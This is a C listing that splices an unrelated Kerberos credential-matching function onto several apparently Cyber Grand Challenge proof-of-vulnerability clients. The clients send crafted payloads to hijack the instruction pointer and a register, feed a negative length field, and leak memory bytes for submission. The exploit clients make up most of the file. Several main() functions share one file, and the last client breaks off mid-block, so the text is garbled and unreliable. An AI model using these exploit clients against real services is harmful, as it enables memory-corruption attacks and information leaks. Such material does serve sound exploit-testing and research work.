/*
 * Decide whether the cached credential `creds` satisfies the request
 * template `mcreds` under the match options in `whichfields`.
 *
 * The principal check always runs: standard_fields_match() must accept the
 * pair, unless KRB5_TC_MATCH_SRV_NAMEONLY is set and srvname_match() accepts
 * it first.  Every other criterion is opt-in: a field is compared only when
 * its KRB5_TC_MATCH_* option is set.  A caller that passes no options
 * therefore gets a match on the principal check alone; session-key type,
 * ticket flags, times, authdata, second ticket and key enctype are all
 * ignored unless requested.
 *
 * Returns TRUE on a match, FALSE otherwise.
 *
 * set() is not defined in this block; presumably a macro that tests bits of
 * `whichfields` -- confirm against its definition.
 */
krb5_boolean
krb5int_cc_creds_match_request(krb5_context context, krb5_flags whichfields,
                               krb5_creds *mcreds, krb5_creds *creds)
{
    /* Principal check; the name-only comparison is tried first when asked for. */
    if (!((set(KRB5_TC_MATCH_SRV_NAMEONLY) &&
           srvname_match(context, mcreds, creds)) ||
          standard_fields_match(context, mcreds, creds))) {
        return FALSE;
    }

    /* From here on, each option that is set can only veto the match. */
    if (set(KRB5_TC_MATCH_IS_SKEY) && mcreds->is_skey != creds->is_skey) {
        return FALSE;
    }
    if (set(KRB5_TC_MATCH_FLAGS_EXACT) &&
        mcreds->ticket_flags != creds->ticket_flags) {
        return FALSE;
    }
    if (set(KRB5_TC_MATCH_FLAGS) &&
        !flags_match(mcreds->ticket_flags, creds->ticket_flags)) {
        return FALSE;
    }
    if (set(KRB5_TC_MATCH_TIMES_EXACT) &&
        !times_match_exact(&mcreds->times, &creds->times)) {
        return FALSE;
    }
    if (set(KRB5_TC_MATCH_TIMES) &&
        !times_match(&mcreds->times, &creds->times)) {
        return FALSE;
    }
    if (set(KRB5_TC_MATCH_AUTHDATA) &&
        !authdata_match(mcreds->authdata, creds->authdata)) {
        return FALSE;
    }
    if (set(KRB5_TC_MATCH_2ND_TKT) &&
        !data_match(&mcreds->second_ticket, &creds->second_ticket)) {
        return FALSE;
    }
    if (set(KRB5_TC_MATCH_KTYPE) &&
        mcreds->keyblock.enctype != creds->keyblock.enctype) {
        return FALSE;
    }

    return TRUE;
}
// Type 1 proof-of-vulnerability client: a fixed, scripted exchange with the
// service under test. Reads go through length_read(0, ...), writes through
// transmit_all(1, ...); the first argument is presumably the descriptor.
//
// Every step lives in its own scope, so the short names (rx, out, bytes,
// expect) are reused from step to step.
//
// NOTE(review): malloc() is never checked and the results of length_read()
// and data_match() are discarded, exactly as in the generated original.
int main(void)
{
    // Presumably (IP mask, register mask, register number) -- confirm against
    // the PoV support library.
    negotiate_type1(0xfbfbfbfb, 0xfbfbfbfb, 2);

    {   // Read 260 bytes; compare 259 of them with the "INITSTART" record.
        static unsigned char expect[] =
            "\x00\x00\x00\x00\x49\x4e\x49\x54\x53\x54\x41\x52\x54\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00";
        unsigned int rx_len = 260;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 259);
        free(rx);
    }

    {   // Send 13 bytes: 8 header bytes, the 32-bit value 1, then "$".
        static unsigned char bytes[] =
            "\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x24";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 13);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 260 bytes; compare with the all-zero statistics banner
        // ("Payments made: 00000000" ... "Net revenue: 00000000").
        static unsigned char expect[] =
            "\x02\x00\x00\x00\x0a\x50\x61\x79\x6d\x65\x6e\x74\x73\x20\x6d\x61"
            "\x64\x65\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x54\x69\x63"
            "\x6b\x65\x74\x73\x20\x67\x69\x76\x65\x6e\x3a\x20\x30\x30\x30\x30"
            "\x30\x30\x30\x30\x0a\x43\x6f\x75\x70\x6f\x6e\x73\x20\x75\x73\x65"
            "\x64\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x47\x72\x6f\x73"
            "\x73\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
            "\x30\x30\x30\x0a\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x20\x63\x6f"
            "\x73\x74\x73\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x4e\x65"
            "\x74\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
            "\x30\x30\x30\x0a\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00";
        unsigned int rx_len = 260;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 259);
        free(rx);
    }

    {   // Send 21 bytes: 8 header bytes, the 32-bit value 9, then 9 bytes.
        static unsigned char bytes[] =
            "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x41\x41\x41\x41"
            "\x41\x41\x41\x41\x24";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 21);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send 32 bytes. Bytes 8..11 are f3 ff ff ff, which is -13 as a
        // little-endian signed 32-bit value. In the two earlier messages the
        // same position held 1 and 9, the number of bytes that followed.
        // NOTE(review): if the service treats this field as a signed length
        // or index, that is where a range check belongs -- confirm against
        // the service source.
        static unsigned char bytes[] =
            "\x00\x00\x00\x00\x00\x00\x00\x00\xf3\xff\xff\xff\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 32);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the contents of the "TYPE1_REG" variable.
        unsigned int out_len = 0;
        unsigned char *out = append_var("TYPE1_REG", NULL, &out_len);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send 84 zero bytes.
        static unsigned char bytes[] =
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 84);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the contents of the "TYPE1_IP" variable.
        unsigned int out_len = 0;
        unsigned char *out = append_var("TYPE1_IP", NULL, &out_len);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the single byte "$".
        static unsigned char bytes[] = "\x24";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 1);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 260 bytes; compare with the all-zero statistics banner again.
        static unsigned char expect[] =
            "\x02\x00\x00\x00\x0a\x50\x61\x79\x6d\x65\x6e\x74\x73\x20\x6d\x61"
            "\x64\x65\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x54\x69\x63"
            "\x6b\x65\x74\x73\x20\x67\x69\x76\x65\x6e\x3a\x20\x30\x30\x30\x30"
            "\x30\x30\x30\x30\x0a\x43\x6f\x75\x70\x6f\x6e\x73\x20\x75\x73\x65"
            "\x64\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x47\x72\x6f\x73"
            "\x73\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
            "\x30\x30\x30\x0a\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x20\x63\x6f"
            "\x73\x74\x73\x3a\x20\x30\x30\x30\x30\x30\x30\x30\x30\x0a\x4e\x65"
            "\x74\x20\x72\x65\x76\x65\x6e\x75\x65\x3a\x20\x30\x30\x30\x30\x30"
            "\x30\x30\x30\x0a\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00";
        unsigned int rx_len = 260;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 259);
        free(rx);
    }

    {   // Read 260 bytes; compare with the "done." record.
        static unsigned char expect[] =
            "\x03\x00\x00\x00\x64\x6f\x6e\x65\x2e\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00";
        unsigned int rx_len = 260;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 259);
        free(rx);
    }
}
// Type 2 proof-of-vulnerability client: exchanges fixed messages with the
// service and assembles a 4-byte value from two of the replies, which it then
// hands to type2_submit().
//
// Every step lives in its own scope, so the short names (rx, out, bytes,
// expect) are reused from step to step.
//
// NOTE(review): malloc() is never checked before the reply buffers are
// indexed, and the results of length_read() and data_match() are discarded,
// exactly as in the generated original.
int main(void)
{
    negotiate_type2();

    unsigned char flag[4] = {0, 0, 0, 0};

    {   // Send 4 bytes.
        static unsigned char bytes[] = "\x03\x03\x03\x03";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 3 bytes: they become flag[0..2] and the variable "stamp0".
        unsigned int rx_len = 3;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        // first 3 bytes of flag come from stamp0
        for (unsigned int k = 0; k != 3; ++k) {
            flag[k] = rx[k];
        }
        assign_from_slice("stamp0", rx, rx_len, 0, 3, 0);
        free(rx);
    }

    {   // Read 2 bytes; compare with 04 04.
        static unsigned char expect[] = "\x04\x04";
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 2);
        free(rx);
    }

    {   // Send the same 4 bytes again.
        static unsigned char bytes[] = "\x03\x03\x03\x03";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 3 bytes: the first becomes flag[3]; all 3 go to "stamp1".
        unsigned int rx_len = 3;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        // 4th byte of flag comes from stamp1
        flag[3] = rx[0];
        assign_from_slice("stamp1", rx, rx_len, 0, 3, 0);
        free(rx);
    }

    {   // Read 2 bytes; compare with 04 04.
        static unsigned char expect[] = "\x04\x04";
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 2);
        free(rx);
    }

    {   // Send 4 bytes.
        static unsigned char bytes[] = "\x00\x0f\xf0\xff";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 2 bytes; compare with 04 17.
        static unsigned char expect[] = "\x04\x17";
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 2);
        free(rx);
    }

    // Submit the 4 collected bytes as the type 2 POV result.
    type2_submit(flag, 4);
}
// Type 2 proof-of-vulnerability client: sends four fixed requests, stores a
// slice of the third reply in the variable "TYPE2_VALUE", waits, and submits.
//
// Every step lives in its own scope, so the short names (rx, out, bytes,
// expect) are reused from step to step.
//
// NOTE(review): malloc() is never checked and the results of length_read()
// and data_match() are discarded, exactly as in the generated original.
int main(void)
{
    negotiate_type2();

    {   // Send 14 bytes.
        static unsigned char bytes[] =
            "\x69\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x61";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 14);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 4 bytes; compare with four zero bytes.
        static unsigned char expect[] = "\x00\x00\x00\x00";
        unsigned int rx_len = 4;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 4);
        free(rx);
    }

    {   // Send 17 bytes.
        static unsigned char bytes[] =
            "\x6d\x25\x42\x2f\xb1\x25\x42\x2f\xb1\x04\x00\x00\x00\x00\x00\x00"
            "\x00";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 17);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 4 bytes; compare with four zero bytes.
        static unsigned char expect[] = "\x00\x00\x00\x00";
        unsigned int rx_len = 4;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 4);
        free(rx);
    }

    {   // Send 17 bytes.
        static unsigned char bytes[] =
            "\x3d\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
            "\x00";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 17);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 16 bytes and store a slice of them as "TYPE2_VALUE".
        // The trailing (12, 0, 1) arguments select the slice; their exact
        // meaning is defined by assign_from_slice(), which is not shown here.
        unsigned int rx_len = 16;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        assign_from_slice("TYPE2_VALUE", rx, rx_len, 12, 0, 1);
        free(rx);
    }

    {   // Send 13 bytes.
        static unsigned char bytes[] =
            "\x71\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 13);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    // Pause before submitting (units are defined by delay(), not shown here).
    delay(100);

    // Submit the type 2 POV result.
    submit_type2(NULL);
}
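// Type 1 proof-of-vulnerability client: negotiates the IP and register
// values, then runs a fixed, scripted exchange with the service.
//
// The register value is held in `gp_value` and the IP value in `ip_value`.
// In the listing as extracted, the address-of expression for the register
// local had been decoded into the U+00AE sign and no longer compiled; the
// local names used here cannot be mistaken for a markup entity.
//
// Every step lives in its own scope, so the short names (rx, out, bytes,
// expect) are reused from step to step.
//
// NOTE(review): malloc() is never checked and the results of length_read()
// and data_match() are discarded, exactly as in the generated original.
int main(void)
{
    type1_vals t1vals;

    // ESI == 6, last byte is going to be off by 8
    type1_negotiate(0xedededed, 0xededede5, 6, &t1vals);

    // have to prevent 0xed from each byte of EIP and REG: 0x12 is the bitwise
    // complement of 0xed, so OR-ing it in sets bits that 0xed has clear.
    unsigned int no_ed = 0x12121212;

    {   // Send 4 bytes.
        static unsigned char bytes[] = "\x04\xd4\x7e\x00";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the 8 ASCII digits "13001388".
        static unsigned char bytes[] = "\x31\x33\x30\x30\x31\x33\x38\x38";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 8);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send 144 bytes: 8 leading bytes followed by 136 ASCII letters.
        static unsigned char bytes[] =
            "\x0f\x44\x00\x00\xcd\xcc\x3c\x40\x75\x4d\x68\x49\x65\x4e\x46\x51"
            "\x5a\x4b\x69\x7a\x62\x57\x6d\x41\x66\x53\x48\x70\x52\x62\x49\x56"
            "\x57\x4e\x56\x43\x66\x70\x51\x5a\x4c\x78\x6b\x7a\x4f\x7a\x61\x65"
            "\x77\x64\x56\x56\x54\x78\x43\x56\x6f\x62\x42\x51\x50\x66\x47\x76"
            "\x75\x64\x45\x51\x74\x4b\x6c\x72\x50\x67\x79\x59\x64\x56\x52\x4d"
            "\x6c\x50\x55\x57\x58\x41\x57\x4a\x62\x42\x69\x47\x41\x52\x55\x59"
            "\x77\x77\x59\x54\x58\x44\x43\x55\x42\x7a\x47\x76\x63\x6b\x6f\x52"
            "\x70\x5a\x69\x6b\x6b\x79\x71\x77\x6b\x67\x61\x66\x58\x6d\x61\x50"
            "\x56\x74\x52\x47\x45\x54\x62\x63\x41\x42\x43\x44\x45\x46\x47\x48";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 144);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // # &desc_copy (EIP) -> JKLM
        // Send the negotiated IP value, OR-ed with no_ed, as 4 raw bytes.
        unsigned int ip_value = t1vals.ipval | no_ed;
        unsigned int out_len = 0;
        unsigned char *out =
            append_buf(NULL, &out_len, (unsigned char *)&ip_value, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // # &p (ESI) -> (N+8)OPQ
        // Send the negotiated register value, OR-ed with no_ed, as 4 raw bytes.
        unsigned int gp_value = t1vals.regval | no_ed;
        unsigned int out_len = 0;
        unsigned char *out =
            append_buf(NULL, &out_len, (unsigned char *)&gp_value, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the single byte 0xed.
        static unsigned char bytes[] = "\xed";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 1);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 2 bytes; the content is not inspected.
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Send 4 bytes.
        static unsigned char bytes[] = "\xc4\xec\x4e\xee";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the 8 ASCII digits "13001388" again.
        static unsigned char bytes[] = "\x31\x33\x30\x30\x31\x33\x38\x38";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 8);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 4 bytes; the content is not inspected.
        unsigned int rx_len = 4;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Read 4 bytes; the content is not inspected.
        unsigned int rx_len = 4;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Read 145 bytes; compare with the letters sent earlier, followed by
        // "ABCDEFGHIJKLMNOP" and 0xed.
        static unsigned char expect[] =
            "\x75\x4d\x68\x49\x65\x4e\x46\x51\x5a\x4b\x69\x7a\x62\x57\x6d\x41"
            "\x66\x53\x48\x70\x52\x62\x49\x56\x57\x4e\x56\x43\x66\x70\x51\x5a"
            "\x4c\x78\x6b\x7a\x4f\x7a\x61\x65\x77\x64\x56\x56\x54\x78\x43\x56"
            "\x6f\x62\x42\x51\x50\x66\x47\x76\x75\x64\x45\x51\x74\x4b\x6c\x72"
            "\x50\x67\x79\x59\x64\x56\x52\x4d\x6c\x50\x55\x57\x58\x41\x57\x4a"
            "\x62\x42\x69\x47\x41\x52\x55\x59\x77\x77\x59\x54\x58\x44\x43\x55"
            "\x42\x7a\x47\x76\x63\x6b\x6f\x52\x70\x5a\x69\x6b\x6b\x79\x71\x77"
            "\x6b\x67\x61\x66\x58\x6d\x61\x50\x56\x74\x52\x47\x45\x54\x62\x63"
            "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
            "\xed";
        unsigned int rx_len = 145;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 145);
        free(rx);
    }

    {   // Read 2 bytes; the content is not inspected.
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Send 4 bytes of 0xff.
        static unsigned char bytes[] = "\xff\xff\xff\xff";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 2 bytes; the content is not inspected.
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }
}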
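// Type 1 proof-of-vulnerability client: negotiates the IP and register
// values, then runs a fixed, scripted exchange with the service.
//
// The register value is held in `gp_value` and the IP value in `ip_value`.
// In the listing as extracted, the address-of expression for the register
// local had been decoded into the U+00AE sign and no longer compiled; the
// local names used here cannot be mistaken for a markup entity.
//
// Every step lives in its own scope, so the short names (rx, out, bytes,
// expect) are reused from step to step.
//
// NOTE(review): malloc() is never checked and the results of length_read()
// and data_match() are discarded, exactly as in the generated original.
int main(void)
{
    type1_vals t1vals;

    // can use either EAX(0) or EDI(7)
    // NOTE(review): the call names register 7, while the comment on the
    // register write below says EAX -- confirm which one is intended.
    type1_negotiate(0xedededed, 0xedededed, 7, &t1vals);

    // have to prevent 0xed from each byte of EIP and REG: 0x12 is the bitwise
    // complement of 0xed, so OR-ing it in sets bits that 0xed has clear.
    unsigned int no_ed = 0x12121212;

    {   // Send 4 bytes.
        static unsigned char bytes[] = "\xad\xdd\xad\xdd";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the 8 ASCII digits "81963890".
        static unsigned char bytes[] = "\x38\x31\x39\x36\x33\x38\x39\x30";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 8);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send 136 bytes: 8 leading bytes followed by 128 ASCII letters.
        static unsigned char bytes[] =
            "\x8c\xdc\x00\x00\x14\xae\x07\x41\x47\x71\x56\x59\x4e\x4e\x43\x54"
            "\x64\x46\x54\x6f\x4a\x67\x62\x6e\x4b\x56\x73\x4e\x72\x4a\x54\x72"
            "\x42\x45\x44\x65\x50\x57\x7a\x53\x4b\x6a\x51\x51\x68\x75\x53\x6f"
            "\x74\x75\x71\x49\x4a\x70\x63\x67\x52\x49\x76\x74\x4a\x70\x49\x4d"
            "\x4c\x4b\x62\x71\x44\x79\x76\x6a\x4f\x53\x41\x47\x66\x75\x46\x6c"
            "\x4f\x41\x51\x66\x54\x4d\x64\x4e\x4d\x7a\x52\x56\x43\x48\x78\x64"
            "\x4a\x43\x5a\x53\x4a\x52\x52\x61\x4c\x63\x7a\x43\x41\x69\x6c\x66"
            "\x4f\x76\x64\x62\x6e\x4b\x6e\x48\x77\x6a\x51\x43\x7a\x6c\x4a\x61"
            "\x66\x4f\x47\x68\x6a\x5a\x5a\x41";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 136);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // EAX (have to prevent 0xed from each of the 4 bytes)
        // Send the negotiated register value, OR-ed with no_ed, as 4 raw bytes.
        unsigned int gp_value = t1vals.regval | no_ed;
        unsigned int out_len = 0;
        unsigned char *out =
            append_buf(NULL, &out_len, (unsigned char *)&gp_value, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the 4 bytes "CCCC".
        static unsigned char bytes[] = "\x43\x43\x43\x43";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // EIP (have to prevent 0xed from each of the 4 bytes)
        // Send the negotiated IP value, OR-ed with no_ed, as 4 raw bytes.
        unsigned int ip_value = t1vals.ipval | no_ed;
        unsigned int out_len = 0;
        unsigned char *out =
            append_buf(NULL, &out_len, (unsigned char *)&ip_value, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the single byte 0xed.
        static unsigned char bytes[] = "\xed";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 1);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 2 bytes; the content is not inspected.
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Send 4 bytes.
        static unsigned char bytes[] = "\xc4\xec\x4e\xee";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Send the 8 ASCII digits "81963890" again.
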